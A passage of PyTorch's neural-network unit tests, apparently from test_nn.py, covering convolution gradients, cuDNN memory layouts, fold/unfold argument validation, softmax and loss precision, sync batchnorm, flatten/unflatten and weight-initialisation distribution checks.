expected = m(input1.view(6, 5), input2.view(6, 6)).view(2, 3, 8)
self.assertEqual(expected, m(input1, input2))
def test_conv_tbc(self):
inp = torch.randn(9, 4, 5, requires_grad=True)
weight = torch.randn(3, 5, 6, requires_grad=True)
bias = torch.randn(6, requires_grad=True)
gradcheck(lambda i, w, b, pad: F.conv_tbc(i, w, b, pad), (inp, weight, bias, 3))
def run_conv_double_back_test(self, kern, stride, padding, chan_in, chan_out, batch_size,
inp_size, dilation, no_weight, groups=1, use_cuda=False,
use_bias=True, dtype=torch.double):
if use_cuda:
device = torch.device("cuda")
else:
device = torch.device("cpu")
x = torch.randn(batch_size, chan_in, inp_size, inp_size, device=device,
dtype=dtype, requires_grad=True)
weight = torch.randn(chan_out, chan_in // groups, kern, kern, device=device,
dtype=dtype, requires_grad=not no_weight)
if use_bias:
bias = torch.randn(chan_out, device=device, dtype=dtype, requires_grad=True)
else:
bias = None
def func(*inputs):
if use_bias:
lx, lweight, lbias = inputs
else:
lx, lweight = inputs
lbias = None
# We disable cudnn during forward to avoid finite difference imprecision issues
with cudnn.flags(enabled=False):
out = F.conv2d(lx, lweight, lbias, stride, padding, dilation, groups)
return out
if use_bias:
inputs = x, weight, bias
else:
inputs = x, weight
dummy_out = func(*inputs)
grad_y = torch.randn_like(dummy_out, device=device, dtype=dtype, requires_grad=True)
# Issue #15353: test mkldnn double backward, don't run gradgradcheck due
# to imprecision issues
if dtype == torch.float:
g, = torch.autograd.grad(dummy_out.sum(), x, create_graph=True)
return g.requires_grad
return gradgradcheck(func, inputs, (grad_y,))
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
@skipIfRocmVersionLessThan((4, 3))
@skipIfNotMiopenSuggestNHWC
def test_grouped_conv_cudnn_nhwc_support(self):
# in order to catch the hols in grouped convolution in nhwc support for earlier cudnn version
input = torch.randn((16, 16, 8, 8), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
weight = torch.randn((8, 4, 3, 3), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
out = torch.convolution(input, weight, None, (1, 1), (1, 1), (1, 1), False, (0, 0), 4)
input = torch.randn((16, 8, 8, 8), dtype=torch.float16, device="cuda").to(memory_format=torch.channels_last)
out_transpose = torch.convolution(input, weight, None, (1, 1), (1, 1), (1, 1), True, (0, 0), 4)
@unittest.expectedFailure
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@unittest.skipIf(not TEST_CUDNN, "needs cudnn")
def test_conv_cudnn_memory_layout_dominance(self):
# desired behavior here is to have the memory_layout of conv.weight to
# dominante the layout of output.
# which is not the same as current behavior, we'll fix this in
# following up PRs and remove the `expectedFailure` tag
input = torch.randint(1, 10, (2, 8, 4, 4), dtype=torch.float32, device="cuda", requires_grad=True)
conv = nn.Conv2d(8, 4, 3).cuda().float()
out = conv(input)
self.assertTrue(out.is_contiguous())
input = input.contiguous(memory_format=torch.channels_last)
out = conv(input)
self.assertTrue(out.is_contiguous())
conv.weight.data = conv.weight.contiguous(memory_format=torch.channels_last)
out = conv(input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
input = input.contiguous()
out = conv(input)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
def test_conv_double_backward(self):
batch_size = 2
for kern, inp_size, dilations in [(3, 6, [1, 2]), (3, 7, [1]), (4, 9, [1])]:
for stride, padding, chan_in, chan_out, dilation in \
product([1, 2], [0, 1, 2], [2], [3], dilations):
for no_weight in (True, False):
for dtype in (torch.float, torch.double):
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, dtype=dtype)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation) +
"\ndtype: " + str(dtype))
def test_conv_double_backward_no_bias(self):
kern = 3
stride = 2
chan_in, chan_out = 2, 4
batch_size = 2
inp_size = 5
padding = 1
dilation = 1
no_weight = False
use_bias = True
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, use_bias=use_bias)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation))
def test_conv_double_backward_groups(self):
kern = 3
stride = 1
padding = 2
chan_in, chan_out = 2, 4
batch_size = 2
inp_size = 6
dilation = 1
no_weight = False
groups = 2
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in * groups, chan_out * groups,
batch_size, inp_size, dilation,
no_weight, groups=groups)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation) +
"\ngroups: " + str(groups))
def test_conv_double_backward_stride(self):
batch_size = 2
# Cannot provide ggW when stride is > 1
for kern, inp_size, dilations in [(3, 5, [1, 2]), (3, 7, [1])]:
for stride, padding, chan_in, chan_out, dilation in product([2], [0, 1], [1], [2], dilations):
no_weight = False
self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_cudnn_noncontiguous_weight(self):
# Noncontiguous weights must be contiguous() before being
# passed to cuDNN
input = torch.tensor([1, 1, 1], dtype=torch.double, device="cuda").view(1, 1, 3)
weights1 = torch.tensor([1], dtype=torch.double, device="cuda").expand(1, 1, 2)
weights2 = torch.tensor([1], dtype=torch.double, device="cuda").expand(1, 1, 2).contiguous()
self.assertEqual(F.conv1d(input, weights1, bias=None, stride=2, dilation=2),
F.conv1d(input, weights2, bias=None, stride=2, dilation=2))
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
@repeat_test_for_types(DOUBLE_TENSORTYPES)
def test_conv_double_backward_cuda(self, dtype=torch.double):
# Double backward only runs with DoubleTensor due to precison reason
batch_size = 1
for kern, inp_size, dilations in [(3, 5, [1, 2]), (4, 9, [1])]:
for stride, padding, chan_in, chan_out, dilation in product([1], [2], [2], [3], dilations):
no_weight = stride == 2
result = self.run_conv_double_back_test(kern, stride,
padding, chan_in, chan_out,
batch_size, inp_size, dilation,
no_weight, use_cuda=True, dtype=dtype)
self.assertTrue(result,
"Conv double backward test failed with parameters:" +
"\nkern: " + str(kern) +
"\nstride: " + str(stride) +
"\npadding: " + str(padding) +
"\nchan_in: " + str(chan_in) +
"\nchan_out: " + str(chan_out) +
"\nbatch_size: " + str(batch_size) +
"\ninp_size: " + str(inp_size) +
"\ndilation: " + str(dilation))
def run_grad_conv_test(self, func_forward, func_backward, dim=1, gradient='input'):
for kern, inp_size in [(3, 6), (3, 7), (4, 9)]:
for batch, stride, padding, chan_in, chan_out, dilation in \
product([1, 2], [1, 2], [0, 1, 2], [2], [3], [1]):
for has_bias in [True, False]:
input_shape = [batch, chan_in]
weight_shape = [chan_out, chan_in]
for _ in range(dim):
input_shape.append(inp_size)
weight_shape.append(kern)
input = torch.randn(input_shape, requires_grad=True)
weight = torch.randn(weight_shape, requires_grad=True)
if has_bias:
bias = torch.randn([chan_out], requires_grad=True)
output = func_forward(input, weight, stride=stride, padding=padding, dilation=dilation, bias=bias)
gradient_o = torch.randn(output.shape)
gradient_w = torch.autograd.grad(output, input if (gradient == 'input') else weight, gradient_o)
self.assertEqual(gradient_w[0],
func_backward(
input_shape if (gradient == 'input') else input,
weight_shape if (gradient == 'weight') else weight,
gradient_o,
stride=stride,
padding=padding,
dilation=dilation))
def test_grad_conv1d_input(self):
self.run_grad_conv_test(F.conv1d, F.grad.conv1d_input, 1, 'input')
def test_grad_conv1d_weight(self):
self.run_grad_conv_test(F.conv1d, F.grad.conv1d_weight, 1, 'weight')
def test_grad_conv2d_input(self):
self.run_grad_conv_test(F.conv2d, F.grad.conv2d_input, 2, 'input')
def test_grad_conv2d_weight(self):
self.run_grad_conv_test(F.conv2d, F.grad.conv2d_weight, 2, 'weight')
def test_grad_conv3d_input(self):
self.run_grad_conv_test(F.conv3d, F.grad.conv3d_input, 3, 'input')
def test_grad_conv3d_weight(self):
self.run_grad_conv_test(F.conv3d, F.grad.conv3d_weight, 3, 'weight')
@unittest.skipIf(not torch._nnpack_available(), "NNPACK unavailable")
def test_nnpack_conv(self):
for kern, inp_size in [(3, 6), (3, 7), (4, 9)]:
for batch, stride, padding, chan_in, chan_out in \
product([1, 2, 3, 4], [1, 2], [0, 1, 2], [2], [3]):
for has_bias in [True, False]:
input_shape = [batch, chan_in]
weight_shape = [chan_out, chan_in]
for _ in range(2):
input_shape.append(inp_size)
weight_shape.append(kern)
input = torch.randn(input_shape, requires_grad=True, dtype=torch.float)
weight = torch.randn(weight_shape, requires_grad=True, dtype=torch.float)
if has_bias:
bias = torch.randn([chan_out], requires_grad=True, dtype=torch.float)
output = torch._nnpack_spatial_convolution(input, weight, stride=stride, padding=padding, bias=bias)
output_expected = torch.nn.functional.conv2d(input, weight, stride=stride, padding=padding, bias=bias)
self.assertEqual(output, output_expected, atol=3e-4, rtol=0)
gradient_o = torch.randn(output.shape, dtype=torch.float)
grads = torch.autograd.grad(output, [input, weight], gradient_o)
grads_expected = torch.autograd.grad(output_expected, [input, weight], gradient_o)
for gr, gr_expected in zip(grads, grads_expected):
self.assertEqual(gr, gr_expected, atol=3e-4, rtol=0)
def test_fold_invalid_arg(self):
# input wrong dimension
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
with self.assertRaisesRegex(NotImplementedError, r"Only 3D input Tensors are supported"):
fold(torch.randn(1, 5))
# input.size(1) not divisible by \prod(kernel_size)
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
with self.assertRaisesRegex(RuntimeError, r"be divisible by the product of kernel_size"):
fold(torch.randn(1, 5, 9))
with self.assertRaisesRegex(RuntimeError, r"be divisible by the product of kernel_size"):
fold(torch.randn(1, 19, 9))
# input.size(2) not matching the total number of sliding blocks
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3))
fold(torch.randn(1, 6, 10))
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3), stride=(2, 2))
fold(torch.randn(1, 6, 5))
with self.assertRaisesRegex(RuntimeError, r"match the calculated number of sliding blocks"):
fold = nn.Fold(output_size=(4, 5), kernel_size=(2, 3), stride=(2, 2), dilation=(1, 2), padding=(2, 0))
fold(torch.randn(1, 6, 5)) # should be 4 * 1 = 4 sliding blocks
def test_unfold_invalid_arg(self):
# input wrong dimension
unfold = nn.Unfold(kernel_size=(2, 3))
with self.assertRaisesRegex(NotImplementedError, r"Only 4D input Tensors are supported"):
unfold(torch.randn(1, 5, 2))
# calculated output shape is too small
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(2, 3))
unfold(torch.randn(1, 2, 2, 2))
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(5, 3), padding=(1, 1))
unfold(torch.randn(1, 2, 2, 3))
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(1, 3), padding=(1, 1), dilation=(1, 2))
unfold(torch.randn(1, 2, 2, 2))
def test_conv_padding_mode(self):
with self.assertRaisesRegex(ValueError, "padding_mode must be one of"):
nn.Conv2d(3, 3, 3, padding_mode="xyz")
with self.assertRaisesRegex(ValueError, "padding_mode must be one of"):
nn.Conv2d(3, 3, 3, padding_mode=3)
with self.assertRaisesRegex(ValueError, "Only \"zeros\" "):
nn.ConvTranspose2d(3, 3, 3, padding_mode="reflect")
def test_softmin(self):
x = torch.randn(2, 16)
self.assertEqual(F.softmin(x, 1), F.softmax(-x, 1))
self.assertEqual(F.softmin(x, 0), F.softmax(-x, 0))
def test_log_softmax_cpu(self, dtype=torch.bfloat16):
inputf = torch.rand(32, 100, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
outf = F.log_softmax(inputf, dim=-1)
out = F.log_softmax(input, dim=-1)
self.assertEqual(out.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(out, outf, atol=0.1, rtol=0)
out.sum().backward()
outf.sum().backward()
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=0.1, rtol=0)
def test_softmax_cpu(self, dtype=torch.bfloat16):
inputf = torch.rand(32, 100, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
outf = F.softmax(inputf, dim=-1)
out = F.softmax(input, dim=-1)
self.assertEqual(out.dtype, dtype)
self.assertEqualIgnoreType(out, outf, atol=1e-3, rtol=0)
out.sum().backward()
outf.sum().backward()
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=1e-3, rtol=0)
def test_adaptive_log_softmax(self):
# args validation
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 15, 15], div_value=2.)
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 15, 10], div_value=2.)
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 25], div_value=2.)
with self.assertRaisesRegex(ValueError, "cutoffs should be a sequence of unique,"):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 20], div_value=2.)
# not raise
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 19], div_value=2.)
# input shapes
with self.assertRaisesRegex(RuntimeError, r"Input and target should have the same size"):
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 5, 10])
asfm(x, y)
# out-of-bound targets
with self.assertRaisesRegex(RuntimeError, r"Target values should be in"):
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 20])
asfm(x, y)
# cluster sizes
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 17])
self.assertEqual(asfm.head.weight.size(), (5 + 3, 16)) # 5 targets in head, 3 clusters, dimensionality 16
self.assertEqual(asfm.tail[0][1].weight.size(), (5, 8)) # 5 targets in this cluster, dimensionality 8
self.assertEqual(asfm.tail[1][1].weight.size(), (5, 4))
self.assertEqual(asfm.tail[2][1].weight.size(), (5, 2))
self.assertEqual(asfm(x, y).output.size(), (2, ))
# log_probs actually returns log_proba
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 4, [2], div_value=2.)
x = torch.randn(4, 8)
logprob_out = asfm.log_prob(x)
self.assertEqual(torch.exp(logprob_out).data.sum(1), torch.ones(4))
# forward returns the same thing as log_probs
for v in [0, 1, 2, 3]:
y = torch.full((4,), v, dtype=torch.long)
out, loss = asfm(x, y)
self.assertEqual(out, logprob_out.gather(1, y.unsqueeze(1)).squeeze())
self.assertEqual(loss, F.nll_loss(logprob_out, y))
# predict
x = torch.randn(64, 8).abs_()
# argmax in shortlist
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
asfm.head.weight.data[asfm.shortlist_size:, :].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
# argmax outside of shortlist
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
asfm.head.weight.data[:asfm.shortlist_size, :].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
# half of the argmax in shortlist, half in clusters
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
x[:32, :asfm.shortlist_size].zero_()
x[32:, asfm.shortlist_size:].zero_()
asfm.head.weight.data[:asfm.shortlist_size, asfm.shortlist_size:].zero_()
asfm.head.weight.data[asfm.shortlist_size:, :asfm.shortlist_size].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
def test_cross_entropy_loss(self, dtype=torch.bfloat16):
loss_cpu = nn.CrossEntropyLoss().cpu()
inputf = torch.randn(15, 10, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
target = torch.empty(15, dtype=torch.long).random_(10)
outf = loss_cpu(inputf, target)
out = loss_cpu(input, target)
self.assertEqual(out.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(out, outf, atol=1e-1, rtol=0)
outf.backward()
out.backward()
self.assertEqual(input.grad.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(input.grad, inputf.grad, atol=1e-1, rtol=0)
def test_cross_entropy_loss_precision(self):
# Regression test for #55657
loss_cpu = nn.CrossEntropyLoss().cpu()
inputf = torch.randn(128, 2, 768, 768, device="cpu", dtype=torch.float)
inputd = inputf.double()
target = torch.randint(2, (128, 768, 768), dtype=torch.long)
outf = loss_cpu(inputf, target)
outd = loss_cpu(inputd, target)
self.assertEqual(outf, outd, exact_dtype=False)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_convert_sync_batchnorm(self):
module = torch.nn.Sequential(
torch.nn.BatchNorm1d(100),
torch.nn.InstanceNorm1d(100)
).cuda()
# necessary to have an anchor point for comparison, in case the
# convert_sync_batchnorm updates in place
comp_module = torch.nn.Sequential(
torch.nn.BatchNorm1d(100),
torch.nn.InstanceNorm1d(100)
).cuda()
comp_module.load_state_dict(module.state_dict())
sync_bn_module = torch.nn.SyncBatchNorm.convert_sync_batchnorm(module)
children = list(sync_bn_module.children())
self.assertEqual(children[0].__class__, torch.nn.SyncBatchNorm)
self.assertEqual(children[1].__class__, torch.nn.InstanceNorm1d)
for layer, converted_layer in zip(comp_module.children(), sync_bn_module.children()):
for key in layer.state_dict().keys():
self.assertEqual(layer.state_dict()[key].device, converted_layer.state_dict()[key].device)
self.assertEqual(layer.state_dict()[key], converted_layer.state_dict()[key])
@unittest.skipIf(not TEST_CUDA, "CUDA not available")
def test_sync_batchnorm_backward_elemt(self):
device = 'cuda'
saved_input = torch.rand(2, 3, 2, 1, device=device)
grad_output = torch.rand(2, 3, 2, 1, device=device)
mean = torch.rand(3, device=device)
invstd = torch.rand(3, device=device)
weight = torch.rand(3, device=device)
sum_dy = torch.rand(3, device=device)
sum_dy_xmu = torch.rand(3, device=device)
count_tensor = torch.tensor([5, 5, 5], dtype=torch.int32, device=device)
gI_contiguous = torch.batch_norm_backward_elemt(
grad_output,
saved_input,
mean,
invstd,
weight,
sum_dy,
sum_dy_xmu,
count_tensor
)
# Test batch_norm_backward_elemt gives the same answer for all
# combinations of contiguous as channels_last input
for a, b in [
(torch.channels_last, torch.contiguous_format),
(torch.contiguous_format, torch.channels_last),
(torch.channels_last, torch.channels_last),
]:
gI_actual = torch.batch_norm_backward_elemt(
grad_output.contiguous(memory_format=a),
saved_input.contiguous(memory_format=b),
mean,
invstd,
weight,
sum_dy,
sum_dy_xmu,
count_tensor
)
self.assertEqual(gI_actual, gI_contiguous)
@unittest.skipIf(not TEST_CUDA, "CUDA not available")
def test_sync_batchnorm_accuracy_cuda(self):
# The target of this test is to test the functionality and accuracy of
# those single-GPU cuda kernels used in SyncBatchNorm
# They are:
# fwd: torch.batch_norm_stats, torch.batch_norm_gather_stats_with_counts, torch.batch_norm_elemt
# bwd: torch.batch_norm_backward_reduce, torch.batch_norm_backward_elemt
def _batch_norm_stats(data):
mean1, _ = torch.batch_norm_stats(data, 1e-5)
mean2, _ = torch.batch_norm_stats(data.to(memory_format=torch.channels_last), 1e-5)
mean_ref = torch.mean(data, (0, 2, 3), keepdim=False)
self.assertEqual(mean_ref, mean1)
self.assertEqual(mean_ref, mean2)
data = torch.randn(1, 96, 112, 112, dtype=torch.float, device='cuda')
_batch_norm_stats(data)
def test_functional_grad_conv(self):
# Conv 1D
input = torch.randn(1, 1, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, requires_grad=True)
output = F.conv1d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv1d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Conv 2D
input = torch.randn(1, 1, 5, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, 3, requires_grad=True)
output = F.conv2d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv2d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Conv 3D
input = torch.randn(1, 1, 5, 5, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, 3, 3, requires_grad=True)
output = F.conv3d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv3d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Warning for _grad_input_padding
with warnings.catch_warnings(record=True) as w:
torch.nn.grad._grad_input_padding(torch.rand(1, 2, 3), [1, 2, 5], (1,), (0,), (3,))
self.assertEqual(len(w), 1)
def test_flatten(self):
tensor_input = torch.randn(2, 1, 2, 3)
# Flatten Tensor
flatten = nn.Flatten(start_dim=1, end_dim=-1)
tensor_output = flatten(tensor_input)
self.assertEqual(tensor_output.size(), torch.Size([2, 6]))
def test_unflatten(self):
tensor_input = torch.randn(2, 50)
# Unflatten Tensor (unflattened_size as a tuple of ints and list of ints)
for us in ((2, 5, 5), [2, 5, 5]):
unflatten = nn.Unflatten(dim=1, unflattened_size=us)
tensor_output = unflatten(tensor_input)
self.assertEqual(tensor_output.size(), torch.Size([2, 2, 5, 5]))
# Unflatten NamedTensor
unflatten = nn.Unflatten(dim='features', unflattened_size=(('C', 2), ('H', 5), ('W', 5)))
named_tensor_input = tensor_input.refine_names('N', 'features')
named_tensor_output = unflatten(named_tensor_input)
self.assertEqual(named_tensor_output.size(), torch.Size([2, 2, 5, 5]))
def test_unflatten_invalid_arg(self):
# Wrong type for unflattened_size (tuple of floats)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of ints, but found element of type float at pos 2"):
nn.Unflatten(dim=1, unflattened_size=(2, 5, 5.0))
# Wrong type for unflattened_size (list of lists and list of tuples)
for us in ([['C', 2], ['W', 5], ['H', 5]], [('C', 2), ('W', 5), ('H', 5)]):
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be a tuple of tuples, but found type list"):
nn.Unflatten(dim='features', unflattened_size=us)
# Wrong type for unflattened_size (tuple of lists)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of tuples, but found element of type list at pos 0"):
nn.Unflatten(dim='features', unflattened_size=(['C', 2], ['W', 5], ['H', 5]))
# Wrong type for unflattened_size (tuple of dicts)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of tuples, but found element of type dict at pos 0"):
nn.Unflatten(dim='features', unflattened_size=({'C': 2}, {'W': 5}, {'H': 5}))
def test_layer_norm_grads_with_create_graph_flag(self):
atol = 1e-5
rtol = 1e-3
x = torch.randn((4, 4, 16), requires_grad=True)
layer_norm = nn.LayerNorm((16,), 1e-5, True)
with torch.no_grad():
layer_norm.weight = torch.nn.Parameter(0.1 * torch.ones_like(layer_norm.weight))
grads1 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=False)[0]
grads2 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=True)[0]
self.assertEqual(grads1, grads2, rtol=rtol, atol=atol)
if TEST_CUDA:
x = x.to('cuda')
layer_norm = layer_norm.to('cuda')
grads1 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=False)[0]
grads2 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=True)[0]
self.assertEqual(grads1, grads2, rtol=rtol, atol=atol)
def test_padding_list(self):
# Padding can be a list, or tuple (regression test for gh-54452)
x = torch.randn(4, 8, 32, 32)
net = torch.nn.ConvTranspose2d(8, 16, kernel_size=3, padding=[3, 3])
y = net(x)
net = torch.nn.ConvTranspose2d(8, 16, kernel_size=3, padding=(3, 3))
y = net(x)
class TestNNInit(TestCase):
def setUp(self):
super(TestNNInit, self).setUp()
random.seed(123)
def _is_normal(self, tensor, mean, std):
samples = tensor.view(-1).tolist()
p_value = stats.kstest(samples, 'norm', args=(mean, std))[1]
return p_value > 0.0001
def _is_trunc_normal(self, tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
def _is_uniform(self, tensor, a, b):
samples = tensor.view(-1).tolist()
p_value = stats.kstest(samples, 'uniform', args=(a, (b - a)))[1]
return p_value > 0.0001
def _create_random_nd_tensor(self, dims, size_min, size_max):
size = [random.randint(size_min, size_max) for _ in range(dims)]
tensor = torch.zeros(size)
return tensor
def _random_float(self, a, b):
return (b - a) * random.random() + a
def test_calculate_gain_linear(self):
for fn in ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose2d', 'conv_transpose2d', 'conv_transpose3d']:
gain = init.calculate_gain(fn)
self.assertEqual(gain, 1)
def test_calculate_gain_nonlinear(self):
for fn in ['sigmoid', 'tanh', 'relu', 'leaky_relu']:
gain = init.calculate_gain(fn)
if fn == 'sigmoid':
self.assertEqual(gain, 1)
elif fn == 'tanh': # 5 / 3
self.assertEqual(gain, 1.6666666666666667)
elif fn == 'relu': # sqrt(2)
self.assertEqual(gain, 1.4142135623730951)
elif fn == 'leaky_relu': # sqrt(2 / 1 + slope^2))
self.assertEqual(gain, 1.4141428569978354)
elif fn == 'selu':
self.assertEqual(gain, 0.75)
def test_calculate_gain_leaky_relu(self):
for param in [None, 0, 0.01, 10]:
gain = init.calculate_gain('leaky_relu', param)
if param is None: # Default slope is 0.01
self.assertEqual(gain, 1.4141428569978354)
elif param == 0: # No slope = same gain as normal ReLU
self.assertEqual(gain, 1.4142135623730951)
elif param == 0.01:
self.assertEqual(gain, 1.4141428569978354)
elif param == 10:
self.assertEqual(gain, 0.14071950894605836)
def test_calculate_gain_leaky_relu_only_accepts_numbers(self):
for param in [True, [1], {'a': 'b'}]:
with self.assertRaises(ValueError):
init.calculate_gain('leaky_relu', param)
def test_calculate_gain_only_accepts_valid_nonlinearities(self):
for n in [2, 5, 25]:
# Generate random strings of lengths that definitely aren't supported
random_string = ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
with self.assertRaises(ValueError):
init.calculate_gain(random_string)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_uniform(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
a = self._random_float(-3, 3)
b = a + self._random_float(1, 5)
init.uniform_(input_tensor, a=a, b=b)
assert self._is_uniform(input_tensor, a, b)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_normal(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
mean = self._random_float(-3, 3)
std = self._random_float(1, 5)
init.normal_(input_tensor, mean=mean, std=std)
assert self._is_normal(input_tensor, mean, std)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_trunc_normal(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
mean = self._random_float(-3, 3)
std = self._random_float(.01, 1)
a = self._random_float(mean - 2 * std, mean)
b = self._random_float(mean, mean + 2 * std)
init.trunc_normal_(input_tensor, mean=mean, std=std, a=a, b=b)
assert self._is_trunc_normal(input_tensor, mean, std, a, b)
def test_constant(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=5)
val = self._random_float(1, 10)
init.constant_(input_tensor, val)
self.assertEqual(input_tensor, input_tensor.clone().fill_(val))
def test_ones_and_zeros(self):
for init_fn_, val in zip([init.ones_, init.zeros_], [1, 0]):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=5)
init_fn_(input_tensor)
self.assertEqual(input_tensor, input_tensor.clone().fill_(val))
def test_eye(self):
